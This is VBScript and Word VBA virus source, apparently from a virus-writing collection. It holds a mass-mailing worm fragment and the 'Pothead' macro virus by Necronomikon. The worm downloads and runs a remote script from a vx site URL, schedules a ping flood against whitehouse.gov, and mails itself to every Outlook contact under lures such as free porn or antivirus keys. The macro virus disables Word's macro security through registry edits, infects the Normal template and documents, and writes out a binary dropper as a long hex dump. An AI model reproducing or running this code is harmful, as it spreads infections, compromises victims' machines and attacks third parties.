inf.WriteLine "" inf.WriteLine (vbsorg) inf.Close End if End If Next End Sub update() Sub update() Dim Inet, myst Dim DoWnLoAd Set Inet = CreateObject("InetCtls.Inet") Inet.RequestTimeOut = 30 DoWnLoAd = Inet.OpenURL("http://vx.netlux.org/rrlf/mite update.txt") set fso = createobject("scripting.filesystemobject") set f = fso.CreateTextFile("c:\update.vbs") f.write DoWnLoAd f.close Set myst = CreateObject("WScript.Shell") myst.run ("c:\update.vbs") end sub dos() sub dos() If Month(Now()) = 5 And Day(Now()) = 9 Then myst.run (fso.GetSpecialFolder(1)+"\ping.exe -t -l 10000 www.whitehouse.gov"),0 End if end sub CheckLang() Email() Sub Email() Set O=CreateObject("Outlook.Application") Set mapi=O.GetNameSpace("MAPI") For Each AL In mapi.AddressLists If AL.AddressEntries.Count <> 0 Then For AddListCount = 1 To AL.AddressEntries.Count Set ALE = AL.AddressEntries(AddListCount) Set go = O.CreateItem(0) go.To = ALE.Address Randomize num=Int((3*Rnd)+1) Set c = f.GetFile(WScript.ScriptFullName) If num = 1 then c.Copy(fso.GetSpecialFolder(0)&"\Free porn.txt.vbs") go.Subject = "New free porn !" go.Body = "Look at this " go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"Free porn.txt.vbs") elseif num = 2 then c.Copy(fso.GetSpecialFolder(0)&"\Free Key (DrWeb and KAV).vbs") go.Subject = "Free Key" go.Body = "Free Key (DrWeb and KAV)" go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"Free Key (DrWeb and KAV).vbs") elseif num = 3 then c.Copy(fso.GetSpecialFolder(0)&"\viruslist.txt.vbs") go.Subject = "News from www.viruslist.com" go.Body = "Read this news" go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"viruslist.txt.vbs") End If If go.To <> "" Then go.Send End If Next End If Next End Sub


Pothead Necronomikon Private Sub Document_Open() On Error Resume Next 'Pothead '(c) by Necronomikon/ZeroGravity '---------------------------------------------------------- ' thanks jackie for some advanced code Word.Application.Options.VirusProtection = n Word.Application.Options.ConfirmConversions = n Word.Application.Options.SaveNormalPrompt = n Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& CommandBars("Macro").Controls("Security...").Enabled = False Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& CommandBars("Macro").Controls("Security...").Enabled = False End Select WordBasic.DisableAutoMacros 0 Application.DisplayStatusBar = False ActiveDocument.ReadOnlyRecommended = False End Sub Private Sub Document_Close() On Error Resume Next On Error Resume Next: Randomize Dim nec1 As Object, nec2 As Object, nec3 As Object, nec4 As Object, nec5 As Object Dim thc As Object, lsd As Object, dope As Object, weed As Object, coke As Object Set nec1 = ActiveDocument: Set nec2 = nec1.VBProject: Set nec3 = nec2.VBComponents: Set nec4 = nec3.Item(1): Set nec5 = nec4.CodeModule Set thc = NormalTemplate: Set lsd = thc.VBProject: Set dope = lsd.VBComponents: Set weed = dope.Item(1): Set coke = weed.CodeModule pshq = coke.countoflines: zero = nec5.countoflines: gravity = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65) If pshq < zero Then For sysnec = 1 To pshq: NT5.replaceline sysnec, gravity: Next sysnec For sysnec = 1 To zero: peace = nec5.lines(sysnec, 1): coke.insertlines sysnec, peace: Next sysnec NormalTemplate.Save: End If If zero < pshq Then For sysnec = 1 To zero: nec5.replaceline sysnec, gravity: Next sysnec For sysnec = 1 To pshq: peace = 
coke.lines(sysnec, 1): nec5.insertlines sysnec, peace: Next sysnec ActiveDocument.Save: End If End Sub Sub FileSaveAs() On Error Resume Next Open Environ("WINDIR") & "\pothead.tmp" For Output As #1 Print #1, "n " & Environ("WINDIR") & "\POTHEAD.JPG"
81 59 FA 9D 6E 9D 2E 6A BF D7 88 CF A5 5A 7A" Print #1, "e 1550 AD 9A 93 D2 A5 E9 59 14 4B 66 9E B7 31 44 BB 16" Print #1, "e 1560 32 F1 B2 48 17 96 B4 A7 1F 0A 6A 7F D3 E8 BA DA" Print #1, "e 1570 03 08 22 F3 FE 24 9C 67 46 E1 38 3E D6 32 58 C3" Print #1, "e 1580 0C 7B 8B 0D A1 7B 4D 61 A5 67 71 5C B9 2F 4D EE" Print #1, "e 1590 05 69 89 0B C5 56 9E 92 1C 84 DD 5B 2A A7 F3 A1" Print #1, "e 15A0 B0 18 E6 50 55 BC 5B 77 47 72 88 D7 29 BC AF C9" Print #1, "e 15B0 00 97 A8 2B 6B CD 02 BB CC AD 94 CA 3B EF 71 BA" Print #1, "e 15C0 6C EE 4A 3A 96 71 6C BE D3 F8 B0 86 96 25 DE 29" Print #1, "e 15D0 DE 29 6E BE 34 00 50 40 17 35 55 8B 96 1C D5 06" Print #1, "e 15E0 CE D8 0B DE 00 57 1A 50 4B 1A DB B7 51 A9 02 AA" Print #1, "e 15F0 40 8D B4 99 03 90 D3 2A CA 29 86 A8 4C 32 36 31" Print #1, "e 1600 97 5C 65 D7 4D A2 68 39 ED D3 78 B7 18 4F 27 BB" Print #1, "e 1610 32 44 6A FD 2B 1E 66 8C 05 04 0D AA 87 DF A1 5E" Print #1, "e 1620 F3 51 1E 4A A1 DE 5D EF 28 AE A5 99 5C 58 F2 2A" Print #1, "e 1630 FA 73 19 B7 71 CC B0 06 E6 30 66 02 8B 51 C8 C5" Print #1, "e 1640 C1 42 04 B7 8D 18 CA 8C AA 84 A0 B8 78 4A BA 6E" Print #1, "e 1650 27 19 6A 10 0C 61 5D D3 AE B7 22 95 77 BF 2B 9F" Print #1, "e 1660 FF C4 00 25 11 00 02 02 01 04 02 02 03 01 01 00" Print #1, "e 1670 00 00 00 00 00 00 01 02 11 12 03 10 21 31 13 20" Print #1, "e 1680 41 51 22 30 61 32 04 FF DA 00 08 01 03 01 01 3F" Print #1, "e 1690 01 16 D4 8E CC 4B 92 2E 4C FC 8F C8 D3 76 C9 35" Print #1, "e 16A0 65 A2 D1 68 C9 16 64 64 64 64 64 64 5A 2D 16 59" Print #1, "e 16B0 7B 59 65 97 E8 95 97 F5 BD 14 CC 07 1C 47 24 28" Print #1, "e 16C0 59 05 52 25 DE EA 0D 9E 33 C6 8F 1F D1 83 29 8D" Print #1, "e 16D0 14 62 CA 65 15 E9 89 8B 31 DD 6D 0D 36 F8 43 D3" Print #1, "e 16E0 69 91 4B A1 E9 89 14 48 75 5B 24 C8 DD DB 1F 7B" Print #1, "e 16F0 23 A1 B6 36 C8 59 5C 12 F7 92 21 1C 98 B4 E2 8E" Print #1, "e 1700 06 C4 CC 54 89 2A 23 B2 FE 0D B9 76 60 DF 42 52" Print #1, "e 1710 5C 12 BF 82 39 BE CA A3 57 EB 6C B6 B6 29 72 74" Print #1, 
"e 1720 66 84 D3 1D 16 8B 1A B1 FB C6 0E 12 1C A5 F0 2F" Print #1, "e 1730 E9 6A 5F E4 A6 5C 57 64 A1 97 23 D3 82 8F F7 68" Print #1, "e 1740 C8 86 D5 2F A3 2A F8 14 C7 3A 5C 9A 93 CB D3 1D" Print #1, "e 1750 A3 25 21 E9 A6 3D 3C 55 8E 0D AB 3C 46 0A 24 9C" Print #1, "e 1760 56 F7 E9 26 43 53 28 F2 26 98 E9 22 A3 DA 1B 4F" Print #1, "e 1770 86 62 91 64 E4 9F 5B 78 A3 DA E8 D2 9D 7E 2C 64" Print #1, "e 1780 5D 19 13 D5 1C EF 69 3A 32 A3 29 33 F2 39 34 BF" Print #1, "e 1790 C8 B5 0C DF D9 1D 47 F2 C9 6A 2F 83 56 77 C1 5B" Print #1, "e 17A0 65 2F B3 CB 24 43 57 23 23 21 ED 09 8A AC 73 A1" Print #1, "e 17B0 BB DA 6B 82 CB 14 D9 CF 64 75 7E CF 31 2D 4B 2E" Print #1, "e 17C0 B9 30 57 63 3F 8C 6A B8 22 A9 6E B8 2C CC 72 BD" Print #1, "e 17D0 A5 D9 F0 38 D8 D1 44 74 DF AA 74 C7 4C A3 1F 65" Print #1, "e 17E0 B7 03 6A 29 9A B2 7A 9C B1 6D 42 FD 12 62 43 D9" Print #1, "e 17F0 A1 2F 78 B6 64 66 CC 89 5D 6D 45 56 D6 5E DD 8D" Print #1, "e 1800 D1 65 91 77 EF 6C AF BF 45 B2 F6 4E 8E C5 C1 43" Print #1, "e 1810 DE 69 C4 C9 89 DE F6 3B 5B C3 AD AC BF 5B B1 6F" Print #1, "e 1820 27 45 D8 BF 46 46 43 77 BE A3 B4 43 27 D0 D3 86" Print #1, "e 1830 ED 0D 56 D5 B7 F0 AD DB AD B1 F5 5A 0E 7C D8 BF" Print #1, "e 1840 E5 89 2D 38 C7 AF 4B 3B 30 67 8C F1 A3 C4 78 59" Print #1, "e 1850 E2 91 E3 97 D1 28 E4 A9 10 83 89 28 64 78 99 2D" Print #1, "e 1860 3F A3 C4 C7 A5 63 D1 FA 3C 26 0C C4 C5 FA 51 CF" Print #1, "e 1870 A4 74 DC 88 C3 1D B5 51 45 18 98 98 51 06 52 1A" Print #1, "e 1880 FA 2D A3 33 22 CF FF C4 00 26 11 00 02 02 01 04" Print #1, "e 1890 02 02 02 03 01 00 00 00 00 00 00 00 01 02 11 12" Print #1, "e 18A0 03 10 21 31 13 20 41 51 04 14 22 30 32 61 FF DA" Print #1, "e 18B0 00 08 01 02 01 01 3F 01 C5 94 51 C9 D1 91 49 95" Print #1, "e 18C0 5E 98 B3 06 60 CC 19 83 31 66 26 26 06 06 26 26" Print #1, "e 18D0 2C C5 98 B3 16 62 CC 59 81 81 80 E3 B7 C6 CD FB" Print #1, "e 18E0 59 17 65 0F 65 BB 92 46 66 66 65 AD AF 6B 2C BF" Print #1, "e 18F0 5B 32 2F 66 86 AB 69 4D 19 21 CF 93 31 8C E6 88" 
Print #1, "e 1900 A6 9E CF D5 F2 21 51 21 31 0B DA 2C 93 A1 EA 32" Print #1, "e 1910 D8 AF 68 EA 57 62 76 4B 6A B1 89 EC 9F D8 E9 74" Print #1, "e 1920 64 8D 3E 59 46 25 14 63 B6 2C A6 2B 29 94 27 42" Print #1, "e 1930 F7 94 93 42 8C 47 14 85 1F B2 A2 38 DF 44 25 5C" Print #1, "e 1940 19 3C B6 68 6A 9D 08 E0 A3 13 1B 21 1C 4A F4 A1" Print #1, "e 1950 C5 A1 4C F2 5B A2 3A 8A E8 CC C9 B1 5F BA 25 1E" Print #1, "e 1960 46 A8 4A CE 7A 65 34 2E 44 84 B6 EC D4 8F C9 46" Print #1, "e 1970 27 24 60 D8 A3 5B 2D EF 69 76 38 18 AF A1 C1 7C" Print #1, "e 1980 22 30 FB 23 1D E8 C5 0E 25 15 BC A2 7C 14 2E C4" Print #1, "e 1990 88 F6 62 8C 76 BE 28 94 17 C1 80 A2 28 FD 19 36" Print #1, "e 19A0 BD 3B 2B 67 B5 15 B4 21 68 A4 E7 43 55 BB F5 6A" Print #1, "e 19B0 C5 C7 A5 3F 47 BC 55 B3 4A 5C 52 1F BA 66 17 FE" Print #1, "e 19C0 46 AB 6D 3D 3B E5 92 74 88 4A 9D 89 F2 58 DF AD" Print #1, "e 19D0 6C CA 28 A1 6E F7 AE 47 DD 94 97 27 7B BF 54 CC" Print #1, "e 19E0 EF 86 28 45 72 D9 E4 F8 89 3B F9 DD FF 00 4F 5B" Print #1, "e 19F0 5F A6 A4 F1 8D A3 F6 75 3E 8D 2D 7C CC 91 AB AE" Print #1, "e 1A00 A0 4B F2 25 68 8C D3 43 69 76 27 63 9C 6F B2 CD" Print #1, "e 1A10 5D 77 19 54 7D 52 6F A2 30 C4 D4 6A BF B5 C6 CF" Print #1, "e 1A20 15 FC 8B 8D FF 00 23 FC 11 CA A9 12 8B D3 88 E0" Print #1, "e 1A30 94 72 1F 3C 92 54 D5 0D 63 2E 07 2C DF F2 34 DB" Print #1, "e 1A40 5C 5D 0D 2A B4 4A 4E 55 13 52 0A 13 A5 BA 83 97" Print #1, "e 1A50 46 4D 1E 57 F0 39 B7 E9 2D 4A 1E BB 21 37 2D AF" Print #1, "e 1A60 76 64 8F 21 E4 67 90 F2 23 34 66 89 DC 95 10 4D" Print #1, "e 1A70 12 59 23 C4 FA 6C 96 8E 4B 83 C1 2E C9 69 B6 EC" Print #1, "e 1A80 F1 BE E2 47 41 63 4F B3 F5 A6 D5 58 FF 00 19 D7" Print #1, "e 1A90 FD 3F 5A 57 6D EF D7 28 CE FF 00 D1 8C 5F 43 55" Print #1, "e 1AA0 C6 EE 54 4A 57 B6 99 65 EF 99 26 58 A8 4A CC 0C" Print #1, "e 1AB0 4C 4F FF C4 00 3D 10 00 01 03 02 03 05 04 08 04" Print #1, "e 1AC0 05 04 03 00 00 00 00 01 00 02 11 03 21 12 22 31" Print #1, "e 1AD0 10 32 41 51 61 13 20 71 81 04 23 30 33 
42 52 72" Print #1, "e 1AE0 91 14 40 62 A1 82 B1 C1 D1 E1 05 24 92 A2 50 73" Print #1, "e 1AF0 F0 FF DA 00 08 01 01 00 06 3F 02 DB 80 EC C2 C3" Print #1, "e 1B00 6E 2E 45 B3 65 2F 74 AD EF 2D 93 2B 8A DE 2B 05" Print #1, "e 1B10 57 19 2B 7C AD F5 38 8A DE 2B 78 AD E2 B7 90 FF" Print #1, "e 1B20 00 C3 D9 C1 6A B5 59 4F 74 A3 B3 7C 2D E0 B7 93" Print #1, "e 1B30 7B 21 BB C5 67 A9 1D 02 8B 9F 35 7F D9 70 0E FB" Print #1, "e 1B40 94 5D 9B 0A C6 F2 ED 62 79 FF 00 95 95 87 A2 31" Print #1, "e 1B50 98 E8 86 43 27 40 AF 64 01 3F 75 A2 D0 4A 9C 2B" Print #1, "e 1B60 71 5D 9B 02 85 A2 D1 6E AD 16 8B 45 A7 7F 55 AF" Print #1, "e 1B70 73 5E EE 8B 45 A2 DD 5A 2D 16 8B 4D 93 78 40 45" Print #1, "e 1B80 CA 89 90 B5 28 E6 24 72 2B 0B 4A DF 9F 25 18 DA" Print #1, "e 1B90 7C 94 4A F5 80 8B 69 CD 6B 1E 2B 79 B7 EB DF 96" Print #1, "e 1BA0 A8 C5 3B 75 80 B0 B7 D6 3B 89 E0 14 D4 AB 11 C9" Print #1, "e 1BB0 61 A4 D2 E6 9D 42 32 EC ED E0 16 31 0E 70 E6 B1" Print #1, "e 1BC0 3F 33 CF D8 2F 5A CC 4E 07 2B 41 86 B4 23 55 B0" Print #1, "e 1BD0 1A 2D 27 8F 80 57 C5 87 A8 44 36 4F 92 89 70 E8" Print #1, "e 1BE0 A1 D6 78 DA 3D 9E E9 5B A7 F2 B2 C6 E1 F3 5C 55" Print #1, "e 1BF0 9B 0E FD B6 1B 4C 2D 60 75 58 42 BE BA 5D 13 18" Print #1, "e 1C00 58 2F 88 AB 2D E3 28 10 21 C2 E1 62 AA F3 8F 9E" Print #1, "e 1C10 AA 26 59 CD 65 33 DC 92 AE 55 B6 44 66 D9 CD 05" Print #1, "e 1C20 0D 37 56 99 54 D8 37 9C 56 1A D7 08 8A 4C 5A B8" Print #1, "e 1C30 06 F2 10 8C CC ED 0E 6E BB 33 21 DE D1 68 B9 95" Print #1, "e 1C40 BB B3 8A E3 B3 75 59 5F DA 68 B4 DA 2F 2A C3 6D" Print #1, "e 1C50 C4 94 70 B0 0E 81 07 E9 3A 4A C4 5A 55 81 2B 13" Print #1, "e 1C60 58 63 44 1B 55 A7 2F 04 62 2F D3 64 8E 3C D5 94" Print #1, "e 1C70 0E E4 34 47 5D B8 58 D9 28 E2 11 C2 39 AD 36 66" Print #1, "e 1C80 72 C9 0A 11 79 02 61 63 2B F1 0F 13 25 16 D3 DE" Print #1, "e 1C90 46 A0 D4 6C 90 32 FC DC 10 68 5A AD 50 52 56 8B" Print #1, "e 1CA0 4E E5 F4 43 6D B6 DC 29 01 5C 29 6F E4 6D B2 F2" Print #1, "e 1CB0 B1 3F 5E 41 3B 18 C4 38 4F 
05 18 02 07 08 B7 25" Print #1, "e 1CC0 66 F5 4D 2E 19 96 2A 22 7A 2D 36 B4 AB EC D0 22" Print #1, "e 1CD0 59 73 8F 0C 28 90 50 02 C1 61 A6 2F C4 A2 F1 48" Print #1, "e 1CE0 3A A2 CE 69 D2 F1 59 3D 26 8B CF 25 A2 CA ED 81" Print #1, "e 1CF0 B3 65 71 2B 00 9C 3C 95 82 22 35 D9 FD 11 7B A7" Print #1, "e 1D00 12 F8 95 9A 54 E9 B2 DE D2 CB 5F C8 C8 D9 31 27" Print #1, "e 1D10 64 93 01 1B CA B0 28 62 DB 88 09 56 BF 44 5F 4D" Print #1, "e 1D20 BA EA 88 22 36 05 1B 7D 25 8E D7 50 81 35 26 89" Print #1, "e 1D30 D7 9A 2D A7 B7 2B F0 9E 70 AC 3B 50 AD 48 84 24" Print #1, "e 1D40 34 79 AC D5 6F E0 A1 C2 5B CC 2B 35 66 7E 13 D5" Print #1, "e 1D50 AA 2C 56 1F 3D B2 CA 35 08 E7 85 5E 85 5F F8 A8" Print #1, "e 1D60 78 20 F5 DB BA B7 56 16 61 07 AA 83 AF 73 55 72" Print #1, "e 1D70 B2 DF 6E BB 4F E4 64 98 56 78 5E F2 16 B8 93 48" Print #1, "e 1D80 42 05 96 6A 52 3E A5 EE 1F FF 00 25 EE 7F EC BD" Print #1, "e 1D90 D3 3F E4 A1 EC 8F 02 9B 56 98 BE C6 E3 7E 00 85" Print #1, "e 1DA0 C3 9A 74 23 61 EC DB 30 BB 5D 0F F3 54 AA 3C 31" Print #1, "e 1DB0 B8 B5 11 74 5D CF 6D D6 1A 14 EE BB 6F 4D C6 EA" Print #1, "e 1DC0 60 6E B7 82 89 2D F2 56 A8 13 B0 E1 F3 E2 83 A9" Print #1, "e 1DD0 38 B0 AF 79 3E 4B 74 59 1A BB 94 C9 D4 F1 58 9E" Print #1, "e 1DE0 DA 8E FA EC A2 95 18 FA 61 AB 07 AD 91 AE 57 59" Print #1, "e 1DF0 07 7A 28 2E 23 86 21 98 2C 75 E9 7C 58 70 15 8E" Print #1, "e 1E00 8B 7B 13 AE A8 FE 1E BB 1E 47 C2 6C 57 AE A4 E6" Print #1, "e 1E10 8E 7C 36 08 D5 35 8F 33 85 69 2B 71 AA EC 0B DD" Print #1, "e 1E20 FE EA E2 36 66 61 2A D4 27 C4 AF 77 1E 6B 33 4A" Print #1, "e 1E30 CA 9A 34 94 EC 4E 35 9F C3 0D 82 B7 B5 BA 76 1A" Print #1, "e 1E40 70 E1 C6 53 2D 78 57 0D 84 50 59 9D 85 AA 01 20" Print #1, "e 1E50 F3 57 CC DE 6A 42 8B F8 05 9A 18 3A AC E4 BC A6" Print #1, "e 1E60 86 E8 B1 0F 30 83 1E 5C D9 E4 9C 2A 99 38 F2 EC" Print #1, "e 1E70 0D 60 B2 2D 75 B8 84 D1 C2 21 61 95 1B 2E 89 A7" Print #1, "e 1E80 43 17 59 5B 8F 6F EF B2 C5 19 DF D5 58 AB A6 B5" Print #1, "e 1E90 AD 71 64 E6 21 
35 A0 65 02 00 45 CC 00 4E AB D5" Print #1, "e 1EA0 E1 3F 52 18 A9 BF 4D E1 70 3C D5 5C BA 66 96 B7" Print #1, "e 1EB0 4F E4 9E 5F 4E 9D 4A BA FA 98 B2 EC 9B 5F B3 A7" Print #1, "e 1EC0 4D B3 61 74 FC 43 3B 77 4E 2B 94 1C EF 47 AA E2" Print #1, "e 1ED0 7A 88 55 3F 08 70 61 18 9E 4E E0 F3 4D 35 18 40" Print #1, "e 1EE0 3A 1E 05 4B 08 26 3C D5 D4 54 A6 E9 9B 38 7F 65" Print #1, "e 1EF0 C6 3C 10 EC C1 0A 69 53 24 2C 35 1A 5A 7A EC D4" Print #1, "e 1F00 E2 44 E2 00 0E AB 2D D6 64 30 EB C9 62 7D 8F B7" Print #1, "e 1F10 78 3E F0 5B C5 61 76 CD 16 88 76 B6 56 7B 56 02" Print #1, "e 1F20 E6 9F 35 99 86 A5 3E 6B 23 5A D5 65 AA E8 A5 60" Print #1, "e 1F30 0D A6 C9 E8 99 44 19 8B 93 B2 C9 CE 22 40 12 9A" Print #1, "e 1F40 FE 3E 32 A6 57 92 CA D5 A4 14 43 49 00 EA B3 16" Print #1, "e 1F50 1F 14 E2 EA 43 EE A0 52 BA B9 B7 25 25 6B 75 8C" Print #1, "e 1F60 D1 AA CF 47 69 83 0F 98 FE A8 BF D1 FD 26 AD 37" Print #1, "e 1F70 9D 5A F7 18 53 40 B2 A7 47 08 2A 4B 5B D8 BB 97" Print #1, "e 1F80 02 9A 25 E1 87 7B 0C 2C 19 8B 99 A0 81 F7 D1 36" Print #1, "e 1F90 A3 58 E6 87 37 0E 3C 5A A0 E6 3A 1E 38 84 E7 B9" Print #1, "e 1FA0 ED 27 90 30 9B 83 86 8D 99 58 6B 51 0C C5 F0 1D" Print #1, "e 1FB0 0A 6E 3F 46 A6 7D 1F E3 A6 D3 36 4F 77 FA 75 4D" Print #1, "e 1FC0 D6 97 1A 6E 1C 3A 6C BE CC 6E 68 68 EA 85 C5 D6" Print #1, "e 1FD0 17 09 5F A7 65 D4 06 8D 99 19 4F B5 3F 16 3C DE" Print #1, "e 1FE0 41 0E CE 86 1A 4D D0 07 05 EB 69 B9 BE 5E DA 5D" Print #1, "e 1FF0 B8 6C 50 2D A8 09 E5 B6 E4 04 61 E4 F9 AB AE 28" Print #1, "e 2000 36 AB 89 7B 8E A4 29 A0 F8 77 25 AA 82 ED 93 C9" Print #1, "e 2010 40 B6 DE C9 8E B9 D1 56 69 7B 4D AC 9D 8C B7 01" Print #1, "e 2020 B3 B3 84 4B 4D 95 F6 58 AC AE 59 94 96 98 45 C1" Print #1, "e 2030 91 E2 A4 AD 2C 8B 84 B5 FE 0B B5 04 53 A6 45 FB" Print #1, "e 2040 53 62 13 00 F4 2A 4D F4 87 6E E1 A6 08 70 E6 B1" Print #1, "e 2050 87 B9 EE AA 6C E7 73 F9 48 E0 8B D9 4F D5 16 E2" Print #1, "e 2060 AB 7F 29 41 B4 EA 0C C2 63 91 46 A8 32 0B 22 21" Print #1, "e 2070 61 
EC C7 67 32 09 D5 37 13 99 DA 37 AA 06 AF A4" Print #1, "e 2080 86 BB F4 85 06 B5 6F 22 3F B2 6B 8B 1E F2 34 97" Print #1, "e 2090 29 04 B4 72 05 16 7A 3D 36 34 B8 10 4C 28 3B 33" Print #1, "e 20A0 14 5B DA 38 B7 85 D6 F9 5E F1 10 FC 38 07 12 AD" Print #1, "e 20B0 B7 B5 3C 6C 11 2D 6B 47 80 53 2B A2 C2 EA 4D 7B" Print #1, "e 20C0 7F 50 5E B2 93 47 F1 15 2C 35 1B E6 AD 59 C3 C4" Print #1, "e 20D0 29 A5 51 AF FD 94 56 69 69 EE 6A B5 56 DA 08 E0" Print #1, "e 20E0 BA F1 1B 30 83 65 EE F1 78 AB 30 0F 35 39 7C DC" Print #1, "e 20F0 A0 D4 A4 7F 89 35 E4 81 E0 56 6D E5 6D 90 0F 96" Print #1, "e 2100 CB 6C 66 5B B9 B8 88 3A 8F 34 D7 3B 0C F3 5E 90" Print #1, "e 2110 FA 8F 73 2F 20 86 92 3F FB CD 06 36 A1 77 88 8E" Print #1, "e 2120 E5 D4 91 2B 49 2A 26 CB 80 FD CA C1 4F 2F 8A 07" Print #1, "e 2130 D3 0B 98 D7 68 E6 5F 0F D4 AA E5 04 37 79 A7 5F" Print #1, "e 2140 15 4F B5 AC 58 EA 4D C7 44 44 CA ED 31 3A 9D 3A" Print #1, "e 2150 90 F8 69 D1 C9 D5 31 39 CF 7E F1 27 54 3B 38 0D" Print #1, "e 2160 E5 0B 15 37 C7 45 15 C5 BE 66 A1 D9 13 8F E6 0A" Print #1, "e 2170 49 BA 12 EF BF 70 1E 3B 38 95 99 8B 76 3C 17 14" Print #1, "e 2180 05 3B 0D B1 C1 00 10 01 5F 67 37 21 DA CB 9D FB" Print #1, "e 2190 05 2E 40 D4 FB 28 6A 2D AB 76 F5 56 BD 33 BA 7D" Print #1, "e 21A0 8C 8D 93 C5 61 52 D3 FB A1 0D B2 F5 95 5A 3A 04" Print #1, "e 21B0 CB CB 16 BB 5B 52 32 BB 8A B6 DA B8 1C E1 86 E0" Print #1, "e 21C0 1E 5C 42 6B 1D 99 9A 46 22 17 69 BA E6 EE 9A 6E" Print #1, "e 21D0 D4 2C 55 70 D3 AF 3B F0 7F 70 8B 71 62 EB DD 81" Print #1, "e 21E0 B3 10 9C 13 C5 53 68 2C 75 57 0B E1 E0 B2 10 D7" Print #1, "e 21F0 E1 C6 CC 57 0F 09 8E F4 78 75 3A 63 CF 09 E0 9B" Print #1, "e 2200 3F 0C E1 E8 11 8D 50 65 4B 29 45 61 1C 76 40 12" Print #1, "e 2210 BD 7D 48 FD 2D 12 55 99 58 FF 00 18 FE CA 29 02" Print #1, "e 2220 7A 77 70 38 CB 39 2D D5 B9 DC 72 69 75 6C 2E E4" Print #1, "e 2230 47 F9 4E 75 2A A2 67 50 16 1A A2 95 4F A9 9F D4" Print #1, "e 2240 2E CD B8 E8 55 F9 5D 99 AA 2A D2 3D 1C DB 85 25" Print #1, 
"e 2250 62 77 92 BA 8A 43 C5 E7 45 2F 39 47 34 F6 8E 17" Print #1, "e 2260 1E 3E CB C5 5A C8 98 99 D9 BE 55 9C E4 26 D0 B3" Print #1, "e 2270 1D 80 22 D1 F0 66 0A 36 BE 9C D4 C4 27 05 47 71" Print #1, "e 2280 1C 8A 18 6A 49 E5 0A 95 1E D1 AD A6 38 B8 27 52" Print #1, "e 2290 AF 49 92 39 14 5E EA 56 D2 31 21 89 BA AB 03 F7" Print #1, "e 22A0 D9 98 A8 1C 56 3A AF 6F 80 37 4C A2 08 68 63 71" Print #1, "e 22B0 CC 6A 54 FD 95 3A 8C 7B DE 00 D3 8C 71 0B 0D 38" Print #1, "e 22C0 81 F1 71 2A CA EB 10 DE 58 1D E4 A5 62 F4 97 76" Print #1, "e 22D0 6D E0 D8 CC 7C 96 4A 53 F5 BB FB 2C 22 1A 39 34" Print #1, "e 22E0 47 B7 D7 28 0A 36 31 C3 56 A1 4A AB 3D 53 AD 8B" Print #1, "e 22F0 88 3C D7 64 E2 39 87 73 0B A2 05 FF 00 C2 D4 7E" Print #1, "e 2300 37 0E 7B AD 52 4E 2F E4 14 63 F6 16 16 D9 3E C8" Print #1, "e 2310 F5 EE 1C D6 4F AA 5E DC 4C E1 F3 04 2A 53 A9 4D" Print #1, "e 2320 E4 8D 34 45 8F 10 E1 C1 03 F7 50 78 2E 2B 9E C6" Print #1, "e 2330 36 77 90 A4 5D 39 A2 50 A1 4F 75 EF BB 88 D0 4A" Print #1, "e 2340 70 91 4F B2 39 5A 45 CA 75 2A 22 5B 52 F1 C5 A5" Print #1, "e 2350 45 4C 25 4B 0A F9 C7 22 B2 6B F2 94 61 0F C3 43" Print #1, "e 2360 AA 9D EA 87 87 82 2E 71 97 1E 3D FB EA AF A7 3E" Print #1, "e 2370 FF 00 69 5F 2B 3F 9A 0D A4 DC 14 FF 00 9E C9 D8" Print #1, "e 2380 FF 00 14 13 8D 42 4F 45 73 6F 95 A8 81 96 9F 12" Print #1, "e 2390 14 0B 34 7B 16 3A C1 ED E0 74 28 B2 AB 04 F3 E5" Print #1, "e 23A0 E1 F9 02 D7 D9 C1 12 6F E6 B0 B9 A5 EC 67 1F 94" Print #1, "e 23B0 20 FA 78 27 81 6F 14 29 D4 27 2A B8 B7 3D 9A 40" Print #1, "e 23C0 41 B4 59 7E 81 17 55 17 88 0A 9B F2 C3 B9 2F C3" Print #1, "e 23D0 D9 A2 A1 D7 0C 94 EA 95 A0 3C 69 51 A2 CF 56 50" Print #1, "e 23E0 46 07 F4 59 65 41 71 6B FA E8 A2 BD 21 3F 30 59" Print #1, "e 23F0 48 A8 3F 56 F0 51 EC 6E BE 52 AF A7 3E E0 58 DD" Print #1, "e 2400 75 89 D6 DB 2D 30 76 02 89 2B DD 17 F4 95 06 1A" Print #1, "e 2410 39 0D 87 97 E5 1C FA BB A3 4D B2 AD 75 4D F4 74" Print #1, "e 2420 03 09 F1 D9 34 ED 65 0C 79 CB A3 56 13 4C 63 F9" 
Print #1, "e 2430 93 4D 36 BB AF 25 85 C1 00 62 75 BF 25 3E 8E 3B" Print #1, "e 2440 47 45 E5 AB 15 1A A0 D4 71 B3 6A 70 41 9E 92 E1" Print #1, "e 2450 5D A7 52 46 EA ED 9A CE CF E9 76 85 61 A8 F9 6B" Print #1, "e 2460 38 F3 51 80 B8 A9 73 6A 37 F7 51 DB 82 39 3D AB" Print #1, "e 2470 2B A0 F4 D1 44 0A 8D E4 A6 1C C3 F2 BB B9 75 3D" Print #1, "e 2480 C1 03 6D D6 5B 1D 98 8D 9A B1 0B 42 C1 62 A4 F7" Print #1, "e 2490 A5 F4 87 99 50 32 B7 93 6D B7 A7 B5 8E E4 ED 89" Print #1, "e 24A0 DB 1B 05 32 22 9E C8 A7 C9 03 E8 AD A8 41 17 80" Print #1, "e 24B0 8F E0 DB 56 A5 70 33 87 08 FD 97 AF 18 5C CC B9" Print #1, "e 24C0 08 05 CB 1B 34 99 82 9C EE CC 07 BC 01 13 A4 20" Print #1, "e 24D0 71 63 04 7C 15 3F CA C4 D7 B0 B2 16 FB 4D 5E 4B" Print #1, "e 24E0 3B E0 72 50 ED 0A C4 D9 3E 05 5D AE 59 D9 75 34" Print #1, "e 24F0 AB 3D BF BA 8A 8F 6B FC A0 A2 59 59 F8 7E 53 7E" Print #1, "e 2500 ED FB 86 F1 DD 18 DA 31 78 28 60 5D 36 13 DD 6A" Print #1, "e 2510 92 F6 FD D6 59 3B 20 2C 23 F2 76 